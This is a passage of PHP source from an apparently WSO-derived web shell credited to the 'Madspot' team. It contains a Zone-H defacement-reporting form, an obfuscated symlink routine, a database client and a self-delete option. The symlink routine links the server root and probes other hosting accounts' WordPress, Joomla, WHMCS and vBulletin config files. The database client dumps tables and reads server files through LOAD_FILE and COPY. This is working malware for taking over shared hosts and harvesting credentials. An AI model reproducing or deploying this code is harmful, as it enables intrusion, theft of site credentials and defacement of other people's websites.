1282     <option value="26" >Rerouting after attacking the Firewall</option>
1283     <option value="27" >Rerouting after attacking the Router</option>
1284     <option value="28" >DNS attack through social engineering</option>
1285     <option value="29" >DNS attack through cache poisoning</option>
1286     <option value="30" >Not available</option>
1287     </select><br>
1288     <select  >
1289     <option >Not available</option>
1290     <option value="1" >Heh...just for fun!</option>
1291     <option value="2" >Revenge against that website</option>
1292     <option value="3" >Political reasons</option>
1293     <option value="4" >As a challenge</option>
1294     <option value="5" >I just want to be the best defacer</option>
1295     <option value="6" >Patriotism</option>
1296     <option value="7" >Not available</option>
1297     </select><br>
1298     <textarea name=domain cols="50" rows="15">List Of Domains</textarea>
1299     <br>
1300     <input type="submit" value=">>" /></form>';
1301     if(isset($_POST['p1']) && isset($_POST['p2']))
1302     {
1303         $hacker =$_POST['p1'];
1304         $method =$_POST['p2'];
1305         $neden ="Not available";
1306         $site =$_POST['p3'];
1307        $i = 0;
1308        $sites = explode("\n", $site);
1309        echo "<pre class=ml1 style='margin-top:5px'>";
1310             while($i < count($sites))
1311             {
1312             if(substr($sites[$i], 0, 4) != "http")
1313             {
1314                             $sites[$i] = "http://".$sites[$i];
1315             }
1316             ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
1317             echo "Site : ".$sites[$i]." Defaced !<br>";
1318             ++$i;
1319             }
1320 
1321         "Sending Sites To Zone-H Has Been Completed Successfully !! </pre>";
1322     }
1323     echo "</div>";
1324     madfooter();
1325 
1326     }
1327     function madspot()
1328     {
1329         madhead();
1330         echo "<div class=header>";
1331         echo "<pre>
1332 
1333                               |`-:_
1334      ,----....____            |    `+.
1335     (             ````----....|___   |
1336      \     _                      ````----....____
1337       \    _)  Coded By: Ikram Ali                ```---.._
1338        \                                                   \
1339      )`.\  )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )hh
1340     -'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `
1341       Madspot is a Team of professional Ethical Hackers From Pakistan.
1342       We have Years of  Experience in  Security, Penetration & Coding
1343       And can Break and Secure.
1344 
1345       Version 1.0
1346 
1347       Contact : http://www.madspot.net
1348 
1349       if you found bug contact our team
1350 
1351 
1352 
1353 
1354                  .=''=.
1355                 / _  _ \
1356                |  d  b  |
1357                \   /\   /
1358               ,/'-=\/=-'\,
1359              / /        \ \     -----------------------------
1360             | / Zahid    \ |    Madspot Digital Security Team
1361             \/ \ Rasheed/ \/    -----------------------------
1362                 '.    .'
1363                 _|`~~`|_
1364                 /|\  /|\
1365 
1366           .- <O> -.        .-====-.      ,-------.      .-=<>=-.
1367       /_-\'''/-_\      / / '' \ \     |,-----.|     /__----__\
1368      |/  o) (o  \|    | | ')(' | |   /,'-----'.\   |/ (')(') \|
1369       \   ._.   /      \ \    / /   {_/(') (')\_}   \   __   /
1370       ,>-_,,,_-<.       >'=jf='<     `.   _   .'    ,'--__--'.
1371     / Waqar.Khan  \    /        \     /'-___-'\    /    <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" />    \
1372     (_)     .     (_)  /  Ikram   \   / M-Usman \  (_)   <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" />   (_)
1373     \_-----'____--/  (_)  Ali   (_) (_)_______(_)   |___:|____|
1374      \___________/     |________|     \_______/     | Afrasiab|
1375 
1376 
1377 
1378 
1379 
1380        </pre></div>";
1381         madfooter();
1382 
1383         }
1384 
1385     function madsymlink()
1386     {
1387         madhead();
1388 
1389     $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1390     $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl );
1391     $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl );  
1392 
1393 
1394 
1395 
1396        echo '<div class=header><script>p1_=p2_=p3_="";</script><br><center><h3><a href=# onclick="g(\'symlink\',null,\'website\',null)">| Domains | </a><a href=# onclick="g(\'symlink\',null,null,\'whole\')">| Whole Server Symlink | </a><a href=# onclick="g(\'symlink\',null,null,null,\'config\')">| Config PHP symlink | </a></h3></center>';
1397 
1398         if(isset($_POST['p1']) && $_POST['p1']=='website')
1399         {
1400             echo "<center>";
1401             $d0mains = @file("/etc/named.conf");
1402             if(!$d0mains){ echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; }
1403 
1404 
1405 
1406     echo "<table align=center class='main'  border=0  >
1407 
1408     <tr bgcolor=Red><td>Count</td><td>domains</td><td>users</td></tr>";
1409     $count=1;
1410     foreach($d0mains as $d0main){
1411 
1412     if(@eregi("zone",$d0main)){
1413 
1414     preg_match_all('#zone "(.*)"#', $d0main, $domains);
1415 
1416     flush();
1417 
1418     if(strlen(trim($domains[1][0])) > 2){
1419 
1420     $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1421 
1422     echo "<tr><td>".$count."</td><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
1423     $count++;
1424     }}}
1425     echo "</center></table>";
1426      }
1427 
1428      if(isset($_POST['p2']) && $_POST['p2']=='whole')
1429      {
1430 
1431 
1432         @set_time_limit(0);
1433 
1434         echo "<center>";
1435 
1436 
1437 
1438     @mkdir('sym',0777);
1439     $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1440     $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
1441     fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
1442     @symlink('/','sym/root');
1443     $IIIIIIIIIlIl = basename('_FILE_');
1444 
1445 
1446     $IIIIIIIIIllI = @file('/etc/named.conf');
1447     if(!$IIIIIIIIIllI)
1448     {
1449     echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1450     }
1451     else
1452     {
1453     echo "<table align='center' width='40%' class='main'><td>Domains</td><td>Users</td><td>symlink </td>";
1454     foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
1455     if(@eregi('zone',$IIIIIIIIIll1)){
1456     preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
1457     flush();
1458     if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
1459     $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
1460     $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
1461     @symlink('/','sym/root');
1462     $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
1463     $IIIIIIII1I11 = '\.ir';
1464     $IIIIIIII1lII = '\.il';
1465     if (@eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
1466     {
1467     $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIIIl11[1][0].'</div>';
1468     }
1469     echo "
1470     <tr>
1471 
1472     <td>
1473     <a target='_blank' href=http://www.".$IIIIIIIIIl11[1][0].'/>'.$IIIIIIII1I1l.' </a>
1474     </td>
1475 
1476     <td>
1477     '.$IIIIIIIII1I1['name']."
1478     </td>
1479 
1480     <td>
1481     <a href='sym/root/home/".$IIIIIIIII1I1['name']."/public_html' target='_blank'>symlink </a>
1482     </td>
1483 
1484 
1485     </tr>";
1486     flush();
1487     }
1488     }
1489     }
1490     }
1491 
1492     echo "</center></table>";
1493 
1494      }
1495 
1496 
1497 
1498      if(isset($_POST['p3']) && $_POST['p3']=='config')
1499 
1500 
1501      {
1502       echo "<center>";
1503     @mkdir('sym',0777);
1504     $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1505     $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
1506     @fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
1507     @symlink('/','sym/root');
1508     $IIIIIIIIIlIl = basename('_FILE_');
1509 
1510 
1511        $IIIIIIIIIllI = @file('/etc/named.conf');
1512     if(!$IIIIIIIIIllI)
1513     {
1514     echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1515     }
1516     else
1517     {
1518     echo "
1519     <table align='center' width='40%' class='main' ><td> Domains </td><td> Script </td>";
1520     foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
1521     if(@eregi('zone',$IIIIIIIIIll1)){
1522     preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
1523     flush();
1524     if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
1525     $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
1526     $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php';
1527     $IIIIIIIII11I=get_headers($IIIIIIIII1l1);
1528     $IIIIIIIII11l=$IIIIIIIII11I[0];
1529     $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php';
1530     $IIIIIIIIlIII=get_headers($IIIIIIIII111);
1531     $IIIIIIIIlIIl=$IIIIIIIIlIII[0];
1532     $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php';
1533     $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
1534     $IIIIIIIIlIll=$IIIIIIIIlIlI[0];
1535     $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php';
1536     $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
1537     $IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
1538     $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php';
1539     $IIIIIIIIllII=get_headers($IIIIIIIIlI11);
1540     $IIIIIIIIllIl=$IIIIIIIIllII[0];
1541     $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php';
1542     $IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
1543     $IIIIIIIIllll=$IIIIIIIIlllI[0];
1544     $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php';
1545     $IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
1546     $IIIIIIIIll1l=$IIIIIIIIll1I[0];
1547     $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php';
1548     $IIIIIIIIl1II=get_headers($IIIIIIIIll11);
1549     $IIIIIIIIl1Il=$IIIIIIIIl1II[0];
1550     $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php';
1551     $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
1552     $IIIIIIIIl1lI=$IIIIIIIIl1II[0];
1553     $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
1554     $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
1555     $IIIIIIIIl11I=$IIIIIIIIl1l1[0];
1556     $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php';
1557     $IIIIIIIIl111=get_headers($IIIIIIIIl11l);
1558     $IIIIIIII1III=$IIIIIIIIl111[0];
1559     $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
1560     $IIIIIIII1II1=get_headers($IIIIIIII1IIl);
1561     $IIIIIIII1IlI=$IIIIIIII1II1[0];
1562     $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
1563     $IIIIIIII1I1I='&nbsp;';
1564     if (strpos($IIIIIIIII11l,'200') == true )
1565     {
1566     $IIIIIIII1I1I="<a href='".$IIIIIIIII1l1."' target='_blank'>Wordpress</a>";
1567     }
1568     elseif (strpos($IIIIIIIIlIIl,'200') == true)
1569     {
1570     $IIIIIIII1I1I="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
1571     }
1572     elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
1573     {
1574     $IIIIIIII1I1I=" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
1575     }
1576     elseif (strpos($IIIIIIIIl1lI,'200')  == true)
1577     {
1578     $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1I1."' target='_blank'>WHMCS</a>";
1579     }
1580     elseif (strpos($IIIIIIIIl11I,'200')  == true)
1581     {
1582     $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
1583     }
1584     elseif (strpos($IIIIIIIIlIll,'200')  == true)
1585     {
1586     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlII1."' target='_blank'>Joomla</a>";
1587     }
1588     elseif (strpos($IIIIIIIIlI1l,'200')  == true)
1589     {
1590     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
1591     }
1592     elseif (strpos($IIIIIIIIllIl,'200')  == true)
1593     {
1594     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlI11."' target='_blank'>vBulletin</a>";
1595     }
1596     elseif (strpos($IIIIIIIIllll,'200')  == true)
1597     {
1598     $IIIIIIII1I1I=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
1599     }
1600     elseif (strpos($IIIIIIIIll1l,'200')  == true)
1601     {
1602     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
1603     }
1604     else
1605     {
1606     continue;
1607     }
1608     $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
1609     echo '<tr><td><a href=http://www.'.$IIIIIIIIIl11[1][0].'/>'.$IIIIIIIIIl11[1][0].'</a></td>
1610     <td>'.$IIIIIIII1I1I.'</td></tr>';flush();
1611     }
1612     }
1613     }
1614     }
1615     echo "</center></table>";  
1616 
1617      }
1618 
1619         echo "</div>";
1620         madfooter();
1621 
1622     }
1623 
1624 
1625     function madsql()
1626     {
1627 
1628 
1629         class DbClass {
1630                     var $type;
1631                     var $link;
1632                     var $res;
1633                     function DbClass($type) {
1634                             $this->type = $type;
1635                     }
1636                     function connect($host, $user, $pass, $dbname){
1637                             switch($this->type)     {
1638                                     case 'mysql':
1639                                             if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1640                                             break;
1641                                     case 'pgsql':
1642                                             $host = explode(':', $host);
1643                                             if(!$host[1]) $host[1]=5432;
1644                                             if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1645                                             break;
1646                             }
1647                             return false;
1648                     }
1649                     function selectdb($db) {
1650                             switch($this->type)     {
1651                                     case 'mysql':
1652                                             if (@mysql_select_db($db))return true;
1653                                             break;
1654                             }
1655                             return false;
1656                     }
1657                     function query($str) {
1658                             switch($this->type) {
1659                                     case 'mysql':
1660                                             return $this->res = @mysql_query($str);
1661                                             break;
1662                                     case 'pgsql':
1663                                             return $this->res = @pg_query($this->link,$str);
1664                                             break;
1665                             }
1666                             return false;
1667                     }
1668                     function fetch() {
1669                             $res = func_num_args()?func_get_arg(0):$this->res;
1670                             switch($this->type)     {
1671                                     case 'mysql':
1672                                             return @mysql_fetch_assoc($res);
1673                                             break;
1674                                     case 'pgsql':
1675                                             return @pg_fetch_assoc($res);
1676                                             break;
1677                             }
1678                             return false;
1679                     }
1680                     function listDbs() {
1681                             switch($this->type)     {
1682                                     case 'mysql':
1683                             return $this->query("SHOW databases");
1684                                     break;
1685                                     case 'pgsql':
1686                                             return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1687                                     break;
1688                             }
1689                             return false;
1690                     }
1691                     function listTables() {
1692                             switch($this->type)     {
1693                                     case 'mysql':
1694                                             return $this->res = $this->query('SHOW TABLES');
1695                                     break;
1696                                     case 'pgsql':
1697                                             return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1698                                     break;
1699                             }
1700                             return false;
1701                     }
1702                     function error() {
1703                             switch($this->type)     {
1704                                     case 'mysql':
1705                                             return @mysql_error();
1706                                     break;
1707                                     case 'pgsql':
1708                                             return @pg_last_error();
1709                                     break;
1710                             }
1711                             return false;
1712                     }
1713                     function setCharset($str) {
1714                             switch($this->type)     {
1715                                     case 'mysql':
1716                                             if(function_exists('mysql_set_charset'))
1717                                                     return @mysql_set_charset($str, $this->link);
1718                                             else
1719                                                     $this->query('SET CHARSET '.$str);
1720                                             break;
1721                                     case 'pgsql':
1722                                             return @pg_set_client_encoding($this->link, $str);
1723                                             break;
1724                             }
1725                             return false;
1726                     }
1727                     function loadFile($str) {
1728                             switch($this->type)     {
1729                                     case 'mysql':
1730                                             return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1731                                     break;
1732                                     case 'pgsql':
1733                                             $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1734                                             $r=array();
1735                                             while($i=$this->fetch())
1736                                                     $r[] = $i['file'];
1737                                             $this->query('drop table wso2');
1738                                             return array('file'=>implode("\n",$r));
1739                                     break;
1740                             }
1741                             return false;
1742                     }
1743                     function dump($table, $fp = false) {
1744                             switch($this->type)     {
1745                                     case 'mysql':
1746                                             $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1747                                             $create = mysql_fetch_array($res);
1748                                             $sql = $create[1].";\n";
1749                         if($fp) fwrite($fp, $sql); else echo($sql);
1750                                             $this->query('SELECT * FROM `'.$table.'`');
1751                         $head = true;
1752                                             while($item = $this->fetch()) {
1753                                                     $columns = array();
1754                                                     foreach($item as $k=>$v) {
1755                                 if($v == null)
1756                                     $item[$k] = "NULL";
1757                                 elseif(is_numeric($v))
1758                                     $item[$k] = $v;
1759                                 else
1760                                     $item[$k] = "'".@mysql_real_escape_string($v)."'";
1761                                                             $columns[] = "`".$k."`";
1762                                                     }
1763                             if($head) {
1764                                 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
1765                                 $head = false;
1766                             } else
1767                                 $sql = "\n\t,(".implode(", ", $item).')';
1768                             if($fp) fwrite($fp, $sql); else echo($sql);
1769                                             }
1770                         if(!$head)
1771                             if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1772                                     break;
1773                                     case 'pgsql':
1774                                             $this->query('SELECT * FROM '.$table);
1775                                             while($item = $this->fetch()) {
1776                                                     $columns = array();
1777                                                     foreach($item as $k=>$v) {
1778                                                             $item[$k] = "'".addslashes($v)."'";
1779                                                             $columns[] = $k;
1780                                                     }
1781                             $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1782                             if($fp) fwrite($fp, $sql); else echo($sql);
1783                                             }
1784                                     break;
1785                             }
1786                             return false;
1787                     }
1788             };
1789             $db = new DbClass($_POST['type']);
1790             if(@$_POST['p2']=='download') {
1791                     $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1792                     $db->selectdb($_POST['sql_base']);
1793             switch($_POST['charset']) {
1794                 case "Windows-1251": $db->setCharset('cp1251'); break;
1795                 case "UTF-8": $db->setCharset('utf8'); break;
1796                 case "KOI8-R": $db->setCharset('koi8r'); break;
1797                 case "KOI8-U": $db->setCharset('koi8u'); break;
1798                 case "cp866": $db->setCharset('cp866'); break;
1799             }
1800             if(empty($_POST['file'])) {
1801                 ob_start("ob_gzhandler", 4096);
1802                 header("Content-Disposition: attachment; filename=dump.sql");
1803                 header("Content-Type: text/plain");
1804                 foreach($_POST['tbl'] as $v)
1805                                     $db->dump($v);
1806                 exit;
1807             } elseif($fp = @fopen($_POST['file'], 'w')) {
1808                 foreach($_POST['tbl'] as $v)
1809                     $db->dump($v, $fp);
1810                 fclose($fp);
1811                 unset($_POST['p2']);
1812             } else
1813                 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1814             }
1815             madhead();
1816             echo "
1817     <div class=header>
1818     <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1819     <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1820     <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1821     <td><select name='type'><option value='mysql' ";
1822         if(@$_POST['type']=='mysql')echo 'selected';
1823     echo ">MySql</option><option value='pgsql' ";
1824     if(@$_POST['type']=='pgsql')echo 'selected';
1825     echo ">PostgreSql</option></select></td>
1826     <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1827     <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1828     <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
1829             $tmp = "<input type=text name=sql_base value=''>";
1830             if(isset($_POST['sql_host'])){
1831                     if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1832                             switch($_POST['charset']) {
1833                                     case "Windows-1251": $db->setCharset('cp1251'); break;
1834                                     case "UTF-8": $db->setCharset('utf8'); break;
1835                                     case "KOI8-R": $db->setCharset('koi8r'); break;
1836                                     case "KOI8-U": $db->setCharset('koi8u'); break;
1837                                     case "cp866": $db->setCharset('cp866'); break;
1838                             }
1839                             $db->listDbs();
1840                             echo "<select name=sql_base><option value=''></option>";
1841                             while($item = $db->fetch()) {
1842                                     list($key, $value) = each($item);
1843                                     echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1844                             }
1845                             echo '</select>';
1846                     }
1847                     else echo $tmp;
1848             }else
1849                     echo $tmp;
1850             echo "</td>
1851                                     <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1852                    <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1853                             </tr>
1854                     </table>
1855                     <script>
1856                s_db='".@addslashes($_POST['sql_base'])."';
1857                function fs(f) {
1858                    if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1859                        if(f.p1) f.p1.value='';
1860                        if(f.p2) f.p2.value='';
1861                        if(f.p3) f.p3.value='';
1862                    }
1863                }
1864                             function st(t,l) {
1865                                     d.sf.p1.value = 'select';
1866                                     d.sf.p2.value = t;
1867                    if(l && d.sf.p3) d.sf.p3.value = l;
1868                                     d.sf.submit();
1869                             }
1870                             function is() {
1871                                     for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1872                                             d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1873                             }
1874                     </script>";
1875             if(isset($db) && $db->link){
1876                     echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1877                             if(!empty($_POST['sql_base'])){
1878                                     $db->selectdb($_POST['sql_base']);
1879                                     echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1880                                     $tbls_res = $db->listTables();
1881                                     while($item = $db->fetch($tbls_res)) {
1882                                             list($key, $value) = each($item);
1883                         if(!empty($_POST['sql_count']))
1884                             $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1885                                             $value = htmlspecialchars($value);
1886                                             echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
1887                                     }
1888                                     echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1889                                     if(@$_POST['p1'] == 'select') {
1890                                             $_POST['p1'] = 'query';
1891                         $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1892                                             $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1893                                             $num = $db->fetch();
1894                                             $pages = ceil($num['n'] / 30);
1895                         echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1896                         echo " of $pages";
1897                         if($_POST['p3'] > 1)
1898                             echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1899                         if($_POST['p3'] < $pages)
1900                             echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1901                         $_POST['p3']--;
1902                                             if($_POST['type']=='pgsql')
1903                                                     $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1904                                             else
1905                                                     $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1906                                             echo "<br><br>";
1907                                     }
1908                                     if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1909                                             $db->query(@$_POST['p2']);
1910                                             if($db->res !== false) {
1911                                                     $title = false;
1912                                                     echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1913                                                     $line = 1;
1914                                                     while($item = $db->fetch())     {
1915                                                             if(!$title)     {
1916                                                                     echo '<tr>';
1917                                                                     foreach($item as $key => $value)
1918                                                                             echo '<th>'.$key.'</th>';
1919                                                                     reset($item);
1920                                                                     $title=true;
1921                                                                     echo '</tr><tr>';
1922                                                                     $line = 2;
1923                                                             }
1924                                                             echo '<tr class="l'.$line.'">';
1925                                                             $line = $line==1?2:1;
1926                                                             foreach($item as $key => $value) {
1927                                                                     if($value == null)
1928                                                                             echo '<td><i>null</i></td>';
1929                                                                     else
1930                                                                             echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1931                                                             }
1932                                                             echo '</tr>';
1933                                                     }
1934                                                     echo '</table>';
1935                                             } else {
1936                                                     echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1937                                             }
1938                                     }
1939                                     echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1940                     if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1941                         echo htmlspecialchars($_POST['p2']);
1942                     echo "</textarea><br/><input type=submit value='Execute'>";
1943                                     echo "</td></tr>";
1944                             }
1945                             echo "</table></form><br/>";
1946                 if($_POST['type']=='mysql') {
1947                     $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1948                     if($db->fetch())
1949                         echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1950                 }
1951                             if(@$_POST['p1'] == 'loadfile') {
1952                                     $file = $db->loadFile($_POST['p2']);
1953                                     echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1954                             }
1955             } else {
1956             echo htmlspecialchars($db->error());
1957         }
1958             echo '</div>';
1959         madfooter();
1960 
1961      }
1962 
1963      function madselfrm()
1964      {
1965 
1966         if($_POST['p1'] == 'yes')
1967                     if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1968                             die('Shell has been removed');
1969                     else
1970                             echo 'unlink error!';
1971         if($_POST['p1'] != 'yes')
1972             madhead();
1973             echo "<div class=header><pre class=ml1 style='margin-top:5px'>";
1974 
1975 
1976         echo "
1977 
1978                    /^\
1979           _.-`:   /   \   :'-._
1980         ,`    :  |     |  :    '.
1981       ,`       \,|     |,/       '.
1982      /           `-...-`           \
1983     :              .'.              :
1984     |             . ' .             |
1985     |             ' . '             |
1986     :              '.'              :
1987      \           ,-'''-,           /
1988       `.       /'|     |'\       ,'
1989         `._   ;  |     |  ;   _,'
1990            `-.:  |     |  :,-'
1991                  |     |
1992                  |     |
1993                  |     |
1994                  |     |
1995                  |     |
1996     ";
1997 
1998 
1999 
2000         echo '<br>Kill Me?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
2001             madFooter();
2002 
2003      }
2004 
2005 
2006     if( empty($_POST['a']) )
2007             if(isset($default_action) && function_exists('mad' . $default_action))
2008                     $_POST['a'] = $default_action;
2009             else
2010                     $_POST['a'] = 'FilesMan';
